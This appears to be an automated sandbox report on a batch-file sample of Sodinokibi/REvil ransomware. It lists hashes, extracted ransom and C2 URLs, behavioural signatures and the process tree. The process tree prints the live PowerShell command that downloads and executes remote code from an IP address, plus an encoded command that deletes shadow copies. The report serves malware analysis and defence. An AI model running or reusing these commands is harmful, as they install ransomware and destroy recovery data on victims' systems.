Analysis
- max time kernel: 141s
- max time network: 55s
- platform: windows7_x64
- resource: win7v200430
- submitted: 21-07-2020 03:10
Static task: static1
Behavioral task: behavioral1
  Sample: c9af7ca3680a5a25e788062683cc93b4.bat
  Resource: win7v200430
Behavioral task: behavioral2
  Sample: c9af7ca3680a5a25e788062683cc93b4.bat
  Resource: win10
General
- Target: c9af7ca3680a5a25e788062683cc93b4.bat
- Size: 219B
- MD5: dc0a4c0f80db22d5242cb4addeaa91f8
- SHA1: ac411eca6ffc942efad96a63d86307d77c9f0c2f
- SHA256: 7de87ff14574bfdf6858a7cf58f8dad6ba484c372a9d5f4b4e3b6a4824d1a40a
- SHA512: ab01868327fdc22ac891fe45261dfa8f737060c5c797fd42296bb71b546f82d84bba3114be6c37b35dd17621dd0f953ecd53191c9664864e9aae983493117e5c
Malware Config
Extracted
- http://185.103.242.78/pastes/c9af7ca3680a5a25e788062683cc93b4
Extracted
- C:\y5h61s8orj-readme.txt
  sodinokibi
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/D2D55285718AB8B9
  http://decryptor.cc/D2D55285718AB8B9
Signatures
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
  Processes:
    pid | process
    1388 | powershell.exe
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes:
    pid | process
    1388 | powershell.exe
    1388 | powershell.exe
    1388 | powershell.exe
    1504 | powershell.exe
    1504 | powershell.exe
- Enumerates connected drives (3 TTPs)
- Modifies service (2 TTPs, 4 IoCs)
  Processes:
    description | ioc | process
    Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
    Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
    Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
    Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
- Suspicious use of WriteProcessMemory (8 IoCs)
  Processes:
    description | pid | process | target process
    PID 828 wrote to memory of 1388 | 828 | cmd.exe | powershell.exe
    PID 828 wrote to memory of 1388 | 828 | cmd.exe | powershell.exe
    PID 828 wrote to memory of 1388 | 828 | cmd.exe | powershell.exe
    PID 828 wrote to memory of 1388 | 828 | cmd.exe | powershell.exe
    PID 1388 wrote to memory of 1504 | 1388 | powershell.exe | powershell.exe
    PID 1388 wrote to memory of 1504 | 1388 | powershell.exe | powershell.exe
    PID 1388 wrote to memory of 1504 | 1388 | powershell.exe | powershell.exe
    PID 1388 wrote to memory of 1504 | 1388 | powershell.exe | powershell.exe
- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes:
    description | pid | process
    Token: SeDebugPrivilege | 1388 | powershell.exe
    Token: SeDebugPrivilege | 1388 | powershell.exe
    Token: SeDebugPrivilege | 1504 | powershell.exe
    Token: SeBackupPrivilege | 740 | vssvc.exe
    Token: SeRestorePrivilege | 740 | vssvc.exe
    Token: SeAuditPrivilege | 740 | vssvc.exe
    Token: SeTakeOwnershipPrivilege | 1388 | powershell.exe
- Blacklisted process makes network request (1 IoCs)
  Processes:
    flow | pid | process
    3 | 1388 | powershell.exe
- Drops file in Program Files directory (20 IoCs)
  Processes:
    description | ioc | process
    File opened for modification | \??\c:\program files\InvokeApprove.3gp2 | powershell.exe
    File opened for modification | \??\c:\program files\RegisterSkip.wmv | powershell.exe
    File opened for modification | \??\c:\program files\ShowConnect.vsx | powershell.exe
    File created | \??\c:\program files\microsoft sql server compact edition\v3.5\y5h61s8orj-readme.txt | powershell.exe
    File created | \??\c:\program files\y5h61s8orj-readme.txt | powershell.exe
    File created | \??\c:\program files\microsoft sql server compact edition\y5h61s8orj-readme.txt | powershell.exe
    File opened for modification | \??\c:\program files\UseCopy.crw | powershell.exe
    File opened for modification | \??\c:\program files\UseSet.3g2 | powershell.exe
    File opened for modification | \??\c:\program files\SetEnter.vsx | powershell.exe
    File opened for modification | \??\c:\program files\UninstallGrant.wmv | powershell.exe
    File created | \??\c:\program files (x86)\y5h61s8orj-readme.txt | powershell.exe
    File opened for modification | \??\c:\program files\BlockExpand.vdw | powershell.exe
    File opened for modification | \??\c:\program files\DisableComplete.wvx | powershell.exe
    File opened for modification | \??\c:\program files\EnterRequest.jpg | powershell.exe
    File opened for modification | \??\c:\program files\JoinExport.css | powershell.exe
    File opened for modification | \??\c:\program files\SelectCompress.search-ms | powershell.exe
    File opened for modification | \??\c:\program files\UnregisterEnable.au | powershell.exe
    File opened for modification | \??\c:\program files\GetExport.docx | powershell.exe
    File opened for modification | \??\c:\program files\RestartReset.xla | powershell.exe
    File created | \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\y5h61s8orj-readme.txt | powershell.exe
- Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  Processes:
    description | ioc | process
    Set value (str) | \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\g9in2e3.bmp" | powershell.exe
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Processes
- C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\c9af7ca3680a5a25e788062683cc93b4.bat"
  PID: 828
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/c9af7ca3680a5a25e788062683cc93b4');Invoke-NZFRVEJKWUXV;Start-Sleep -s 10000"
    PID: 1388
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Blacklisted process makes network request
    - Drops file in Program Files directory
    - Sets desktop wallpaper using registry
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      PID: 1504
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 740
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken